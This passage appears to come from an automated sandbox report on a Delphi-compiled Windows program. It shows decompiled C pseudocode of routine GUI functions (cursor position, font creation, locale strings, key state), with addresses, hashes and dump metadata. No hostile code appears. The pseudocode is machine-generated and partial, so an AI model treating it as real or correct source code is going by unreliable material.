				intOrPtr _v24;
				char _v28;
				char _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t54;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t88;
				intOrPtr _t105;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t120;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t134;
				void* _t137;

				_t137 = __fp0;
				_v8 = __ecx;
				_t88 = __edx;
				_t124 = __eax;
				 *0x496b88 = __eax;
				_push(_t133);
				_push(0x434aa1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t134;
				_v12 = 0;
				 *0x496b90 = 0;
				_t135 =  *((char*)(__eax + 0x9b));
				if( *((char*)(__eax + 0x9b)) != 0) {
					E004037D8(__eax, __eflags);
					__eflags =  *0x496b88;
					if( *0x496b88 != 0) {
						__eflags = _v12;
						if(_v12 == 0) {
							_v12 = E00433CD8(1, _t124);
							 *0x496b90 = 1;
						}
						_t128 =  *((intOrPtr*)(_v12 + 0x38));
						_t105 =  *0x4323f0; // 0x43243c
						_t54 = E00403768( *((intOrPtr*)(_v12 + 0x38)), _t105);
						__eflags = _t54;
						if(_t54 == 0) {
							_t129 =  *((intOrPtr*)(_v12 + 0x38));
							__eflags =  *((intOrPtr*)(_t129 + 0x30));
							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
								L14:
								__eflags = 0;
								E00412BA4(0,  &_v36, 0, _t124, _t129);
								E004360C4(_t129,  &_v28,  &_v36);
								_t60 = _v12;
								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
								L15:
								_t130 = _v12;
								_t125 =  *((intOrPtr*)(_v12 + 0x38));
								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
								E00412BA4( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)), _t125, _t130);
								_t65 = _v12;
								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
								goto L16;
							}
							_t116 =  *0x4323f0; // 0x43243c
							_t71 = E00403768(_t129, _t116);
							__eflags = _t71;
							if(_t71 != 0) {
								goto L14;
							}
							GetCursorPos( &_v20);
							_t74 = _v12;
							 *(_t74 + 0x44) = _v20.x;
							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
							goto L15;
						} else {
							GetWindowRect(E0043CC2C(_t128), _v12 + 0x44);
							L16:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							L17:
							E0043478C(_v12, _v8, _t88, _t133, _t137);
							_pop(_t115);
							 *[fs:eax] = _t115;
							return 0;
						}
					}
					_pop(_t120);
					 *[fs:eax] = _t120;
					return 0;
				}
				E004037D8(__eax, _t135);
				if( *0x496b88 != 0) {
					__eflags = _v12;
					if(_v12 == 0) {
						_v12 = E00433BC0(_t124, 1);
						 *0x496b90 = 1;
					}
					goto L17;
				}
				_pop(_t123);
				 *[fs:eax] = _t123;
				return 0;
			}




























                                                                        0x004348fc
                                                                        0x00434905
                                                                        0x00434908
                                                                        0x0043490a
                                                                        0x0043490c
                                                                        0x00434914
                                                                        0x00434915
                                                                        0x0043491a
                                                                        0x0043491d
                                                                        0x00434922
                                                                        0x00434925
                                                                        0x0043492c
                                                                        0x00434933
                                                                        0x00434989
                                                                        0x0043498e
                                                                        0x00434995
                                                                        0x004349a4
                                                                        0x004349a8
                                                                        0x004349b8
                                                                        0x004349bb
                                                                        0x004349bb
                                                                        0x004349c5
                                                                        0x004349ca
                                                                        0x004349d0
                                                                        0x004349d5
                                                                        0x004349d7
                                                                        0x004349f5
                                                                        0x004349f8
                                                                        0x004349fc
                                                                        0x00434a29
                                                                        0x00434a2e
                                                                        0x00434a30
                                                                        0x00434a3d
                                                                        0x00434a42
                                                                        0x00434a48
                                                                        0x00434a4e
                                                                        0x00434a51
                                                                        0x00434a51
                                                                        0x00434a5a
                                                                        0x00434a63
                                                                        0x00434a69
                                                                        0x00434a6e
                                                                        0x00434a74
                                                                        0x00434a7a
                                                                        0x00000000
                                                                        0x00434a7a
                                                                        0x00434a00
                                                                        0x00434a06
                                                                        0x00434a0b
                                                                        0x00434a0d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00434a13
                                                                        0x00434a18
                                                                        0x00434a1e
                                                                        0x00434a24
                                                                        0x00000000
                                                                        0x004349d9
                                                                        0x004349e8
                                                                        0x00434a7d
                                                                        0x00434a86
                                                                        0x00434a87
                                                                        0x00434a88
                                                                        0x00434a89
                                                                        0x00434a8a
                                                                        0x00434a92
                                                                        0x00434a99
                                                                        0x00434a9c
                                                                        0x00000000
                                                                        0x00434a9c
                                                                        0x004349d7
                                                                        0x00434999
                                                                        0x0043499c
                                                                        0x00000000
                                                                        0x0043499c
                                                                        0x0043493e
                                                                        0x0043494a
                                                                        0x00434959
                                                                        0x0043495d
                                                                        0x00434971
                                                                        0x00434974
                                                                        0x00434974
                                                                        0x00000000
                                                                        0x0043495d
                                                                        0x0043494e
                                                                        0x00434951
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: <$C
                                                                        • API String ID: 0-3423417450
                                                                        • Opcode ID: fc7312295d466d1b6c2efc2a349e4abf85d9fbfa0e8825b772108cf843e98e7d
                                                                        • Instruction ID: c90d3436bb83f37f3896d1cde7c7445814aa3cbfde0b1555d2802c3bcb8cf98a
                                                                        • Opcode Fuzzy Hash: fc7312295d466d1b6c2efc2a349e4abf85d9fbfa0e8825b772108cf843e98e7d
                                                                        • Instruction Fuzzy Hash: 62517E74A042059FCB00DF69D841ADEBBF5FF98328F1190AAE804A7361D779B985CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041F478, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E0041F478(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x41f601);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(E0041F608);
					return E0040436C( &_v80, 3);
				} else {
					_t76 =  *0x496a74; // 0x2150658
					E0041E7FC(_t76);
					_push(_t137);
					_push(0x41f5d9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E004045A4( &_v72, _v8 + 0x1b);
						if(E0040864C(_v72, "Default") != 0) {
							E004045A4( &_v80, _v8 + 0x1b);
							E00408C90( &(_v68.lfFaceName), _v80);
						} else {
							E004045A4( &_v76, "\rMS Sans Serif");
							E00408C90( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E0041F75C(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x41f5e0);
					_t81 =  *0x496a74; // 0x2150658
					return E0041E808(_t81);
				}
			}
















                                                                        0x0041f479
                                                                        0x0041f47b
                                                                        0x0041f481
                                                                        0x0041f484
                                                                        0x0041f487
                                                                        0x0041f48a
                                                                        0x0041f48e
                                                                        0x0041f48f
                                                                        0x0041f494
                                                                        0x0041f497
                                                                        0x0041f49d
                                                                        0x0041f4a7
                                                                        0x0041f5eb
                                                                        0x0041f5ee
                                                                        0x0041f600
                                                                        0x0041f4ad
                                                                        0x0041f4ad
                                                                        0x0041f4b2
                                                                        0x0041f4b9
                                                                        0x0041f4ba
                                                                        0x0041f4bf
                                                                        0x0041f4c2
                                                                        0x0041f4cc
                                                                        0x0041f4d8
                                                                        0x0041f4dd
                                                                        0x0041f4e2
                                                                        0x0041f4e7
                                                                        0x0041f4f1
                                                                        0x0041f4fc
                                                                        0x0041f4f3
                                                                        0x0041f4f3
                                                                        0x0041f4f3
                                                                        0x0041f50d
                                                                        0x0041f51a
                                                                        0x0041f527
                                                                        0x0041f530
                                                                        0x0041f53c
                                                                        0x0041f550
                                                                        0x0041f575
                                                                        0x0041f580
                                                                        0x0041f552
                                                                        0x0041f55a
                                                                        0x0041f565
                                                                        0x0041f565
                                                                        0x0041f585
                                                                        0x0041f589
                                                                        0x0041f58d
                                                                        0x0041f598
                                                                        0x0041f59a
                                                                        0x0041f5a2
                                                                        0x0041f59c
                                                                        0x0041f59e
                                                                        0x0041f5a8
                                                                        0x0041f5a0
                                                                        0x0041f5ae
                                                                        0x0041f5ae
                                                                        0x0041f59e
                                                                        0x0041f5be
                                                                        0x0041f5be
                                                                        0x0041f5c3
                                                                        0x0041f5c6
                                                                        0x0041f5c9
                                                                        0x0041f5ce
                                                                        0x0041f5d8
                                                                        0x0041f5d8

                                                                        APIs
                                                                          • Part of subcall function 0041E7FC: RtlEnterCriticalSection.KERNEL32(?,0041E839), ref: 0041E800
                                                                        • CreateFontIndirectA.GDI32(?), ref: 0041F5B6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CreateCriticalEnterFontIndirectSection
                                                                        • String ID: MS Sans Serif$Default
                                                                        • API String ID: 2931345757-2137701257
                                                                        • Opcode ID: 29ecfd2846ab71fec9c4193a5fb4111e2c3dc0bae6f8b124e61999baa7fe3b75
                                                                        • Instruction ID: c6d3fcb0f525e24af73f531a10b58b6f758537922a732ded3b048f0f413673bb
                                                                        • Opcode Fuzzy Hash: 29ecfd2846ab71fec9c4193a5fb4111e2c3dc0bae6f8b124e61999baa7fe3b75
                                                                        • Instruction Fuzzy Hash: 28516E30A04248DFDB01CFA9C541BCDBBF6AF49304F2580BAD804A7352D3789E96CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409A84, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 65%
                                                                        			E00409A84(void* __ebx, void* __edi, void* __esi) {
				int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t53;
				void* _t54;
				intOrPtr _t80;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t87;
				intOrPtr _t90;

				_t89 = _t90;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t90);
				_push(0x409b97);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				_v8 = GetThreadLocale();
				_t53 = 1;
				_t86 = 0x496758;
				_t83 = 0x496788;
				do {
					_t3 = _t53 + 0x44; // 0x45
					E00409A48(_t3 - 1, _t53 - 1,  &_v16, 0xb, _t89);
					E0040439C(_t86, _v16);
					_t6 = _t53 + 0x38; // 0x39
					E00409A48(_t6 - 1, _t53 - 1,  &_v20, 0xb, _t89);
					E0040439C(_t83, _v20);
					_t53 = _t53 + 1;
					_t83 = _t83 + 4;
					_t86 = _t86 + 4;
				} while (_t53 != 0xd);
				_t54 = 1;
				_t87 = 0x4967b8;
				_t84 = 0x4967d4;
				do {
					_t8 = _t54 + 5; // 0x6
					asm("cdq");
					_v12 = _t8 % 7;
					E00409A48(_v12 + 0x31, _t54 - 1,  &_v24, 6, _t89);
					E0040439C(_t87, _v24);
					E00409A48(_v12 + 0x2a, _t54 - 1,  &_v28, 6, _t89);
					E0040439C(_t84, _v28);
					_t54 = _t54 + 1;
					_t84 = _t84 + 4;
					_t87 = _t87 + 4;
				} while (_t54 != 8);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(E00409B9E);
				return E0040436C( &_v28, 4);
			}

















                                                                        0x00409a85
                                                                        0x00409a89
                                                                        0x00409a8a
                                                                        0x00409a8b
                                                                        0x00409a8c
                                                                        0x00409a8d
                                                                        0x00409a8e
                                                                        0x00409a94
                                                                        0x00409a95
                                                                        0x00409a9a
                                                                        0x00409a9d
                                                                        0x00409aa5
                                                                        0x00409aa8
                                                                        0x00409aad
                                                                        0x00409ab2
                                                                        0x00409ab7
                                                                        0x00409ac6
                                                                        0x00409aca
                                                                        0x00409ad5
                                                                        0x00409ae9
                                                                        0x00409aed
                                                                        0x00409af8
                                                                        0x00409afd
                                                                        0x00409afe
                                                                        0x00409b01
                                                                        0x00409b04
                                                                        0x00409b09
                                                                        0x00409b0e
                                                                        0x00409b13
                                                                        0x00409b18
                                                                        0x00409b18
                                                                        0x00409b20
                                                                        0x00409b23
                                                                        0x00409b3b
                                                                        0x00409b46
                                                                        0x00409b60
                                                                        0x00409b6b
                                                                        0x00409b70
                                                                        0x00409b71
                                                                        0x00409b74
                                                                        0x00409b77
                                                                        0x00409b7e
                                                                        0x00409b81
                                                                        0x00409b84
                                                                        0x00409b96

                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(00000000,00409B97,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409AA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: LocaleThread
                                                                        • String ID: 4w@$<v@
                                                                        • API String ID: 635194068-2181857394
                                                                        • Opcode ID: 031ed5dcb529cad3d0294120807776f5ada001c53162cb20b0110185eb27f802
                                                                        • Instruction ID: 8564910674612e7aa7f8c9bef030902903e116a4d87ded3b75f7abf6dfca8640
                                                                        • Opcode Fuzzy Hash: 031ed5dcb529cad3d0294120807776f5ada001c53162cb20b0110185eb27f802
                                                                        • Instruction Fuzzy Hash: A0319871F001085BDB00DA95D881AAE77ADEBC8314F61807BFA09E7782D63DED018769
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004438EC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E004438EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _t32;
				intOrPtr _t52;
				void* _t57;
				intOrPtr _t69;
				intOrPtr _t76;
				void* _t78;
				void* _t80;
				void* _t81;
				intOrPtr _t82;

				_t80 = _t81;
				_t82 = _t81 + 0xfffffff0;
				_t78 = __ecx;
				_t57 = __edx;
				_v8 = __eax;
				_v16 = E004242CC(1);
				_push(_t80);
				_push(0x4439eb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				if( *((char*)(_v8 + 0x41)) == 0) {
					L3:
					_push(0);
					_push(E004436F8(_v8, _v16, _t57, __eflags));
					_t32 = E004436E8(_v8);
					L00426AA8();
					_v12 = _t32;
					__eflags = 0;
					_t69 = _t32;
					 *[fs:eax] = _t69;
					_push(0x4439f2);
					return E004035DC(_v16);
				} else {
					_t84 = _t78 - 0xffffffff;
					if(_t78 == 0xffffffff) {
						goto L3;
					} else {
						_v20 = E004242CC(1);
						 *[fs:eax] = _t82;
						 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x4439ad, _t80);
						E00425838(_v20, _t78);
						E0044351C(_v8);
						_push(E004436D8( *((intOrPtr*)( *_v20 + 0x68))()));
						_push(E004436F8(_v8, _v16, _t57, _t84));
						_t52 =  *((intOrPtr*)(_v8 + 0x3c));
						L00426AA8();
						_v12 = _t52;
						_t76 = _t52;
						 *[fs:eax] = _t76;
						_push(0x4439d5);
						return E004035DC(_v20);
					}
				}
			}
















                                                                        0x004438ed
                                                                        0x004438ef
                                                                        0x004438f4
                                                                        0x004438f6
                                                                        0x004438f8
                                                                        0x00443907
                                                                        0x0044390c
                                                                        0x0044390d
                                                                        0x00443912
                                                                        0x00443915
                                                                        0x0044391f
                                                                        0x004439b4
                                                                        0x004439b4
                                                                        0x004439c3
                                                                        0x004439c7
                                                                        0x004439cd
                                                                        0x004439d2
                                                                        0x004439d5
                                                                        0x004439d7
                                                                        0x004439da
                                                                        0x004439dd
                                                                        0x004439ea
                                                                        0x00443925
                                                                        0x00443925
                                                                        0x00443928
                                                                        0x00000000
                                                                        0x0044392e
                                                                        0x0044393a
                                                                        0x00443948
                                                                        0x00443952
                                                                        0x0044395a
                                                                        0x00443962
                                                                        0x00443979
                                                                        0x00443987
                                                                        0x0044398b
                                                                        0x0044398f
                                                                        0x00443994
                                                                        0x00443999
                                                                        0x0044399c
                                                                        0x0044399f
                                                                        0x004439ac
                                                                        0x004439ac
                                                                        0x00443928

                                                                        APIs
                                                                        • 734520C0.COMCTL32(?,00000000,00000000,?,00000000,004439EB), ref: 0044398F
                                                                        • 734520C0.COMCTL32(00000000,00000000,00000000,00000000,004439EB), ref: 004439CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: 734520
                                                                        • String ID: DA
                                                                        • API String ID: 3632036016-2080325668
                                                                        • Opcode ID: ccd8e2105615a610abee5b20ed0fe88bc36b8bc16ea5897006935c09f0e991ca
                                                                        • Instruction ID: 32eae90527f60b3240dfe4ecec9ccfcab97337b482669b5735be93bbf68b5d75
                                                                        • Opcode Fuzzy Hash: ccd8e2105615a610abee5b20ed0fe88bc36b8bc16ea5897006935c09f0e991ca
                                                                        • Instruction Fuzzy Hash: 75318470B00215AFEB00EF6AC88295EB7F9FB49715B6144B6F414E73A1CB74AE00CB18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004499B4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84keyboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E004499B4(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x496bf8; // 0x2150880
					E004268F8(_t34,  &_v24);
					_push(_t69);
					_push(0x449ab2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E004496B8(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x449ab9);
							_t40 =  *0x496bf8; // 0x2150880
							return E004268F0(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x496bf8; // 0x2150880
					E004268F8(_t42,  &_v8);
					_push(_t69);
					_push(0x449a87);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E00449860( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x449a8e);
					_t48 =  *0x496bf8; // 0x2150880
					return E004268F0(_t48);
				}
				L14:
			}


















                                                                        0x004499b5
                                                                        0x004499b7
                                                                        0x004499bb
                                                                        0x004499bd
                                                                        0x004499c7
                                                                        0x004499d0
                                                                        0x00449acf
                                                                        0x004499d6
                                                                        0x004499e0
                                                                        0x004499e2
                                                                        0x004499e2
                                                                        0x004499f2
                                                                        0x004499f4
                                                                        0x004499f4
                                                                        0x004499fe
                                                                        0x00449a00
                                                                        0x00449a00
                                                                        0x00449a0c
                                                                        0x00449a12
                                                                        0x00449a17
                                                                        0x00449a1e
                                                                        0x00449a1f
                                                                        0x00449a24
                                                                        0x00449a27
                                                                        0x00449a2a
                                                                        0x00449a2a
                                                                        0x00449a3c
                                                                        0x00449a43
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00449a92
                                                                        0x00449a9c
                                                                        0x00449a9f
                                                                        0x00449aa2
                                                                        0x00449aa7
                                                                        0x00449ab1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00449a92
                                                                        0x00449a48
                                                                        0x00449a4d
                                                                        0x00449a54
                                                                        0x00449a55
                                                                        0x00449a5a
                                                                        0x00449a5d
                                                                        0x00449a6c
                                                                        0x00449a71
                                                                        0x00449a74
                                                                        0x00449a77
                                                                        0x00449a7c
                                                                        0x00449a86
                                                                        0x00449a86
                                                                        0x00000000

                                                                        APIs
                                                                        • GetKeyState.USER32(00000010), ref: 004499D8
                                                                        • GetKeyState.USER32(00000011), ref: 004499EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: State
                                                                        • String ID:
                                                                        • API String ID: 1649606143-3916222277
                                                                        • Opcode ID: 94615d3298e6c2b1289478aca6bd501869d773b40b841513df6d38ea5f5749f1
                                                                        • Instruction ID: 784b168bbd6622d86c8817c47da5e1e24199c79018d4424b72d08e920171472a
                                                                        • Opcode Fuzzy Hash: 94615d3298e6c2b1289478aca6bd501869d773b40b841513df6d38ea5f5749f1
                                                                        • Instruction Fuzzy Hash: 7A31D670A04384EFEB11EFA6D81169FB7F5EB45304F9684BBE800B6291E7785E00D658
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00456CA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E00456CA0(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				intOrPtr _t36;
				long _t41;
				intOrPtr _t51;
				void* _t55;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t74 = _t75;
				_t76 = _t75 + 0xfffffff0;
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t74);
				_push(0x456dae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t55 = E00456C1C(_v8);
				if( *((char*)(_v8 + 0x88)) != 0) {
					_t51 = _v8;
					_t79 =  *((intOrPtr*)(_t51 + 0x48));
					if( *((intOrPtr*)(_t51 + 0x48)) == 0) {
						E004571F4(_v8);
					}
				}
				E00454DA8(_t55,  &_v20);
				E00433724(_v20, 0,  &_v16, _t79);
				_t36 =  *0x496c04; // 0x2150d40
				E00456E5C(_t36, _v16, _t79);
				_v9 = 1;
				_push(_t74);
				_push(0x456d57);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *((short*)(_v8 + 0xea)) != 0) {
					 *((intOrPtr*)(_v8 + 0xe8))();
				}
				if(_v9 != 0) {
					E00456BB8();
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_t41 = GetCurrentThreadId();
				_t67 =  *0x495c4c; // 0x496030
				if(_t41 ==  *_t67 && E0041C0B0() != 0) {
					_v9 = 0;
				}
				if(_v9 != 0) {
					WaitMessage();
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E00456DB5);
				return E0040436C( &_v20, 2);
			}

















                                                                        0x00456ca1
                                                                        0x00456ca3
                                                                        0x00456cab
                                                                        0x00456cae
                                                                        0x00456cb1
                                                                        0x00456cb6
                                                                        0x00456cb7
                                                                        0x00456cbc
                                                                        0x00456cbf
                                                                        0x00456cca
                                                                        0x00456cd6
                                                                        0x00456cd8
                                                                        0x00456cdb
                                                                        0x00456cdf
                                                                        0x00456ce4
                                                                        0x00456ce4
                                                                        0x00456cdf
                                                                        0x00456cee
                                                                        0x00456cf9
                                                                        0x00456d01
                                                                        0x00456d06
                                                                        0x00456d0b
                                                                        0x00456d11
                                                                        0x00456d12
                                                                        0x00456d17
                                                                        0x00456d1a
                                                                        0x00456d28
                                                                        0x00456d39
                                                                        0x00456d39
                                                                        0x00456d43
                                                                        0x00456d48
                                                                        0x00456d48
                                                                        0x00456d4f
                                                                        0x00456d52
                                                                        0x00456d6c
                                                                        0x00456d71
                                                                        0x00456d79
                                                                        0x00456d84
                                                                        0x00456d84
                                                                        0x00456d8c
                                                                        0x00456d8e
                                                                        0x00456d8e
                                                                        0x00456d95
                                                                        0x00456d98
                                                                        0x00456d9b
                                                                        0x00456dad

                                                                        APIs
                                                                          • Part of subcall function 00456C1C: GetCursorPos.USER32 ref: 00456C25
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00456D6C
